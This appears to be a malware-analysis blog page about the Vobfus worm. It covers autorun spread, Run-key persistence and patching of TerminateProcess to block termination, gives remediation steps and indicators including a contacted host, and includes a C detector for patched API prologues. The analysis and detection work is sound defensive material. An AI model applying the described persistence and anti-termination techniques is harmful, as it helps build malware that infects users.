<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhf74oiKAKOhMXdOfDtVwEvz29BsCeVQZqY9fLRuVyxQmhuZEHLnoZYDo4XwyTjQxiEIMMrY-YLu_wvshd1bnYbHxRhgEQNLwcmcPIZOCzN0GCLEBYLXs2L_ijfiNdi0fI6sbiivlCu/s1600/2nd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhf74oiKAKOhMXdOfDtVwEvz29BsCeVQZqY9fLRuVyxQmhuZEHLnoZYDo4XwyTjQxiEIMMrY-YLu_wvshd1bnYbHxRhgEQNLwcmcPIZOCzN0GCLEBYLXs2L_ijfiNdi0fI6sbiivlCu/s1600/2nd.png" height="71" width="320" /></a></div>
<div>
<span lang="EN-US" style="font-family: inherit; line-height: 115%;"><span style="font-family: inherit;"><div class="MsoNormal">
<span lang="EN-US"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-US">This ensures automatic execution of the
malware when the autorun feature is enabled for removable drives. Dropped files on
removable/shared drives are also set with the READONLY, HIDDEN and
SYSTEM attributes. It also drops multiple shortcut links that point to the malware.</span></div>
<div class="MsoNormal">
<br /></div>
</span></span><div style="font-family: inherit;">
<span lang="EN-US" style="line-height: 115%;"><span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;">Using the CreateToolhelp32Snapshot, Process32First
and Process32Next APIs, it traverses the running processes and prevents users from
manually closing the malware: it patches the TerminateProcess and TerminateThread APIs
in each process's memory so that when these APIs are called they simply return without
doing anything. It does this with the WriteProcessMemory API, replacing the first byte
of TerminateProcess and TerminateThread with 0xC3 (RETN).</span></span></span></div>
<div class="separator" style="clear: both; font-family: inherit; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGJNlaxHw2H_XSrGyhdCXzQykZyhoDV-MghItpm3gdruu_a2uf_IORXm25Hqj77VPSScQp4Npmw6Jd3gI_pWWpWSSvtL4mVFyV7fD2WHNVJsuasj5yil2uA6Qv2HBE-0kuNJpjd5Hx/s1600/3rd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGJNlaxHw2H_XSrGyhdCXzQykZyhoDV-MghItpm3gdruu_a2uf_IORXm25Hqj77VPSScQp4Npmw6Jd3gI_pWWpWSSvtL4mVFyV7fD2WHNVJsuasj5yil2uA6Qv2HBE-0kuNJpjd5Hx/s1600/3rd.png" height="39" width="320" /></a></div>
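<div style="font-family: inherit;">
As an added example (not code from either post on this page), the following C program shows how an analyst would classify the first bytes of an exported API to tell a clean prologue apart from the two in-memory patches described here: the 5-byte JMP detour that kswebshield.dll writes over its hooked APIs and the 0xC3 (RETN) stub that vobfus writes over TerminateProcess and TerminateThread. The module base, module size, export addresses and detour target are constructed sample values, not taken from the samples; on a live system the bytes would come from ReadProcessMemory and the ranges from the module list.
</div>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* What the first bytes of an exported function look like. */
typedef enum {
    PROLOGUE_CLEAN = 0,   /* ordinary prologue, no patch recognised              */
    PROLOGUE_JMP_INSIDE,  /* E9 rel32 landing inside the same module (benign     */
                          /* hot-patch thunk or tail call)                       */
    PROLOGUE_JMP_OUTSIDE, /* E9 rel32 landing outside the module: a detour like  */
                          /* the one kswebshield.dll installs                    */
    PROLOGUE_RET_STUB     /* C3 as the first byte: the "do nothing" stub vobfus  */
                          /* writes over TerminateProcess/TerminateThread        */
} prologue_kind;

/* One entry of a (constructed) export snapshot: name, virtual address and
 * the first 5 bytes read from the target process. */
typedef struct {
    const char *name;
    uint32_t    va;
    uint8_t     bytes[5];
} export_sample;

/* Decode the target of a 5-byte E9 rel32 near jump located at func_va.
 * The displacement is relative to the next instruction (func_va + 5) and is
 * a signed 32-bit value, so wrapping uint32_t arithmetic yields the correct
 * 32-bit virtual address for both forward and backward jumps. */
uint32_t decode_jmp_target(const uint8_t *bytes, uint32_t func_va)
{
    uint32_t rel = (uint32_t)bytes[1]         | ((uint32_t)bytes[2] << 8) |
                   ((uint32_t)bytes[3] << 16) | ((uint32_t)bytes[4] << 24);
    return func_va + 5u + rel;
}

/* Classify the prologue of a function at func_va that belongs to the module
 * occupying [module_base, module_base + module_size). */
prologue_kind classify_prologue(const uint8_t *bytes, size_t len, uint32_t func_va,
                                uint32_t module_base, uint32_t module_size)
{
    if (len == 0)
        return PROLOGUE_CLEAN;
    if (bytes[0] == 0xC3)                 /* RETN as the very first instruction */
        return PROLOGUE_RET_STUB;
    if (bytes[0] == 0xE9 && len >= 5) {   /* JMP rel32 */
        uint32_t target = decode_jmp_target(bytes, func_va);
        if (target >= module_base && target < module_base + module_size)
            return PROLOGUE_JMP_INSIDE;
        return PROLOGUE_JMP_OUTSIDE;
    }
    return PROLOGUE_CLEAN;
}

/* Count exports whose prologue was patched to leave the module or to return
 * immediately; jumps that stay inside the module are not counted. */
size_t count_suspicious(const export_sample *table, size_t n,
                        uint32_t module_base, uint32_t module_size)
{
    size_t hits = 0;
    for (size_t i = 0; i < n; i++) {
        prologue_kind k = classify_prologue(table[i].bytes, 5, table[i].va,
                                            module_base, module_size);
        if (k == PROLOGUE_JMP_OUTSIDE || k == PROLOGUE_RET_STUB)
            hits++;
    }
    return hits;
}

/* Constructed sample module range (made-up values, not a real kernel32 layout). */
#define SAMPLE_MODULE_BASE 0x7C800000u
#define SAMPLE_MODULE_SIZE 0x000F6000u

/* Constructed snapshot of four exports. 0x10001000 is a made-up address in a
 * hypothetical injected DLL; E9 FB 5F 7F 93 encodes JMP 0x10001000 when the
 * instruction sits at 0x7C80B000. */
const export_sample SAMPLE_EXPORTS[] = {
    { "CreateProcessW",   0x7C80A000u, { 0x8B, 0xFF, 0x55, 0x8B, 0xEC } }, /* mov edi,edi; push ebp; mov ebp,esp */
    { "LoadLibraryA",     0x7C80B000u, { 0xE9, 0xFB, 0x5F, 0x7F, 0x93 } }, /* JMP 0x10001000 (outside module)    */
    { "WinExec",          0x7C80C000u, { 0xE9, 0x00, 0x01, 0x00, 0x00 } }, /* JMP 0x7C80C105 (inside module)     */
    { "TerminateProcess", 0x7C80D000u, { 0xC3, 0xFF, 0x55, 0x8B, 0xEC } }, /* RETN written over mov edi,edi      */
};
const size_t SAMPLE_EXPORT_COUNT = sizeof SAMPLE_EXPORTS / sizeof SAMPLE_EXPORTS[0];

int main(void)
{
    static const char *label[] = { "clean", "jmp inside module", "jmp OUTSIDE module", "ret stub" };
    for (size_t i = 0; i < SAMPLE_EXPORT_COUNT; i++) {
        prologue_kind k = classify_prologue(SAMPLE_EXPORTS[i].bytes, 5, SAMPLE_EXPORTS[i].va,
                                            SAMPLE_MODULE_BASE, SAMPLE_MODULE_SIZE);
        printf("%-17s %08X  %s", SAMPLE_EXPORTS[i].name, (unsigned)SAMPLE_EXPORTS[i].va, label[k]);
        if (k == PROLOGUE_JMP_INSIDE || k == PROLOGUE_JMP_OUTSIDE)
            printf(" -> %08X", (unsigned)decode_jmp_target(SAMPLE_EXPORTS[i].bytes, SAMPLE_EXPORTS[i].va));
        putchar('\n');
    }
    printf("%zu suspicious export(s)\n",
           count_suspicious(SAMPLE_EXPORTS, SAMPLE_EXPORT_COUNT, SAMPLE_MODULE_BASE, SAMPLE_MODULE_SIZE));
    return 0;
}
```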
<div style="font-family: inherit;">
<span lang="EN-US" style="line-height: 115%;"><br /></span></div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">Unlike its natively compiled vobfus counterpart, which only modifies the terminate-related APIs in processes whose names contain the strings “task” or “proc”, this p-code version of vobfus carries a list of processes to skip. The processes listed below are left untouched.</span></span><br />
<br />
<ul>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> taskmgr.exe</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> explorer.exe</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> svchost.exe</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> winlogon.exe</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> services.exe</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> lsass.exe</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> alg.exe</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> csrss.exe</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> smss.exes (Yes! This is not a typo)</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> spoolsv.exe</span></li>
<li><span style="font-family: inherit; line-height: 16.866666793823242px;"> firefox.exe</span></li>
</ul>
<br />
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;"><br /></span></span>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">It then creates its REGRUN entry to ensure activation at every system startup:</span></span><br />
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] “<RandomFileName>” = %USERPROFILE%\<RandomFileName>.exe. </span></span><br />
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;"><br /></span></span>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">It also changes the folder settings to hide protected operating system files (files with the SYSTEM attribute) in order to conceal the malware from casual inspection. It does this by modifying the registry value [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced] “ShowSuperHidden” = dword:00000000 (from dword:00000001).</span></span><br />
<span lang="EN-US"><span style="font-family: inherit;"><span lang="EN-US" style="line-height: 16.866666793823242px;"></span></span></span><br />
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;"><br /></span></span>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">Note that this malware changes the ProductName, FileVersion, ProductVersion, InternalName and OriginalFileName of every dropped copy of itself, so that the copies do not share a single file hash and simple hash-based detection by AV vendors is defeated.</span></span></div>
<div style="font-family: inherit;">
<br /></div>
</div>
<h3>
<span style="font-family: inherit; font-size: large;">MANUAL REMEDIATION</span></h3>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;">In order to restore the system, the first thing we need is a way to kill the
vobfus process. Remember that this version of vobfus skips the processes in the list
above when patching TerminateProcess and TerminateThread, so we can rename a copy of
Process Explorer to explorer.exe in order to fool the malware into leaving it untouched.</span></span></div>
<span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;"><br /></span></span>
<span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;">To put it in steps:</span></span><br />
<div class="MsoListParagraphCxSpFirst" style="margin-left: .25in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit;"><span lang="EN-US">1.
</span><!--[endif]--><span lang="EN-US">Rename procexp.exe to explorer.exe.<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: .25in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit;"><span lang="EN-US">2.
</span><!--[endif]--><span lang="EN-US">Run explorer.exe (copy of
procexp.exe).<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: .25in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit;"><span lang="EN-US">3.
</span><!--[endif]--><span lang="EN-US">Terminate vobfus malware in
memory.<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: .25in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit;"><span lang="EN-US">4.
</span><!--[endif]--><span lang="EN-US">Delete the following registry
entries using regedit:<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: .75in; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit;"><span lang="EN-US">a.
</span><!--[endif]--><span lang="EN-US">[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“<RandomFileName>” = %USERPROFILE%\<RandomFileName>.exe<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: .25in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit;"><span lang="EN-US">5.
</span><!--[endif]--><span lang="EN-US">Modify the following registry
entry using regedit:<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: .75in; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit;"><span lang="EN-US">a.
</span><!--[endif]--><span lang="EN-US">[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
“ShowSuperHidden” = dword:00000000 (change it back to dword:00000001 to see hidden system
files in Explorer.)<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpLast" style="margin-left: .25in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit;"><span lang="EN-US">6.
</span><!--[endif]--><span lang="EN-US">Manually delete copies of
malware found in %USERPROFILE%\<RandomFileName>.exe and removable/shared
drives including the created autorun.inf, ert.dll and shortcuts that point to
vobfus.<o:p></o:p></span></span></div>
<span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;">
</span></span><br />
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;">As a recommendation, run a full system scan
using Vipre to completely remove possible remnants of the malware.</span><o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;"><br /></span></span></div>
<h3>
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">SUMMARY</span></span></h3>
<div>
<span lang="EN-US"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><b><i>Platforms</i></b>: WINXP, WIN7, WIN8 x64<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><b><i>File-type:
</i></b>Win32 PE<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><b><i>Malware-type:</i></b>
WORM<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><b><i>Vtest first
seen date:</i></b> 12/29/2013 22:02<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><b><i>Vipre
detection name:</i></b> Trojan.Win32.Generic!BT<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><b><i>Installation</i></b><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span lang="EN-US"><span style="font-family: inherit;"><i>Dropped files</i><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: .75in;">
</div>
<ul>
<li><span style="font-family: inherit;">%USERPROFILE%\<RandomFileName>.exe (copy of
malware)</span></li>
<li><span style="font-family: inherit;">Adds copy of itself to removable and shared
drives (including floppy A:\) and may have filenames</span></li>
<li><span style="font-family: inherit;">Adds shortcut links pointing to the malware in
removable/shared drives such as:</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">Documents.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">Music.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">New Folder.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">Passwords.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">Pictures.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">Video.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">zAS.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">zbI.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">zdG.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">zKU.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">zTn.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">zug.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">zww.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">zYh.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">zYJ.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: .75in;">
</div>
<ul>
<li><span style="font-family: inherit;">Creates autorun.inf file in removable/shared
drives and points to malware copy</span></li>
<li><span style="font-family: inherit;">May also drop another Trojan in removable/shared
drives with filename ert.dll</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span lang="EN-US"><span style="font-family: inherit;"><i>Registry</i><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.0in;">
<span lang="EN-US"><span style="font-family: inherit;"><i>Added registry</i><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.5in;">
</div>
<ul>
<li><span style="font-family: inherit;">[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“<RandomFileName>” = %USERPROFILE%\<RandomFileName>.exe - to
execute vobfus at system startup</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin-left: 1.0in;">
<span lang="EN-US"><span style="font-family: inherit;"><i>Modified registry</i><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.5in;">
</div>
<ul>
<li><span style="font-family: inherit;">[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
“ShowSuperHidden” = dword:00000000 (from dword:00000001) – to hide vobfus
dropped copy from users</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span lang="EN-US"><span style="font-family: inherit;"><i>Memory Residency</i></span></span></div>
<div class="MsoNormal" style="margin-left: 1.0in;">
<span lang="EN-US"><span style="font-family: inherit;"><i>Invoked processes</i>:
%USERPROFILE%\<RandomFileName>.exe (malware dropped copy)<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><i><b>Backdoor/Bot/Stealer</b></i></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span lang="EN-US"><span style="font-family: inherit;"><i>Communicates to/from</i><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.0in;">
<span style="font-family: inherit;"><span lang="EN-US">Attempts to connect to</span><span lang="EN-US" style="background-color: white; line-height: 115%;"> </span><span lang="EN-US">ns4.theimageparlour.net</span></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><b><i>Propagates</i></b><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span lang="EN-US"><span style="font-family: inherit;"><i>Method of spreading</i>: copies itself
into removable and mapped network drives.</span></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><i><b>General
Malware</b></i><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span lang="EN-US"><span style="font-family: inherit;"><i>Summary of payload</i><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 1in;">
</div>
<ul>
<li><span style="font-family: inherit;">drops malware copies to removable
and mapped network drives</span></li>
<li><span style="font-family: inherit;">patches the TerminateProcess and
TerminateThread APIs loaded in every process except those on its exclusion
list, to prevent them from terminating the vobfus malware</span></li>
<li><span style="font-family: inherit;">may attempt to connect to outside
address in order to download updated copy of itself</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><b><i>Pertinent
APIs used </i></b></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">advapi32<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">CloseHandle<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">connect<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">CreateToolhelp32Snapshot<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">GetDiskFreeSpaceExW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">GetDriveTypeW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">GetFileAttributesW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">GetLocaleInfoW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">GetLogicalDrives<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">GetLogicalDriveStringsW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">CreateMutexW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">GetModuleHandleW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">GetUserNameW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">ExitProcess<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">htons<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">InternetCloseHandle<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">InternetOpenUrlW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">InternetOpenW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">InternetReadFile<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">kernel32<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">OpenProcess<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">Process32First<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">shell32<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">ShellExecuteW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">SHGetSpecialFolderPathW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">Sleep<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">socket<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">TerminateProcess<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">user32<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">wininet<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">WriteProcessMemory<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">WSAAsyncSelect<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">WSAStartup<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">wsock32<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">RegCreateKeyExW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">RegSetValueExW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">RegCloseKey<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><b><i>What makes
it unique</i></b>: Visual Basic compiled and obfuscation techniques</span></span><span lang="EN-US" style="color: #595959; font-size: 10.0pt;"><o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
</span></div>
Posted by Anonymous (http://www.blogger.com/profile/10653752703445056399)

Native Vobfus Malware (2014-05-01T19:41:00-07:00)<h3>
<span style="font-family: inherit; font-size: large;">ANALYSIS</span></h3>
<div class="MsoNormal">
<span style="font-family: inherit;">VOBFUS (short for VB Obfuscated malware) is Visual Basic-compiled malware, either pseudo code (p-code) or native code, that uses obfuscation techniques to elude the signature-based detection of most antivirus software.</span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;">The sample being analyzed (a5e979799c725b45c39cfe87257107d2) is native code compiled. Let’s skip all the obfuscation techniques and focus on what the actual vobfus malware does.</span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;">At some point after the malware’s self-de-obfuscation in memory, a call to the MSVBVM60.rtcStrConvVar2 API is made and the actual vobfus strings (in Unicode format) are revealed. From the revealed strings alone we can already form at least a rough idea of what it does or will do.</span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
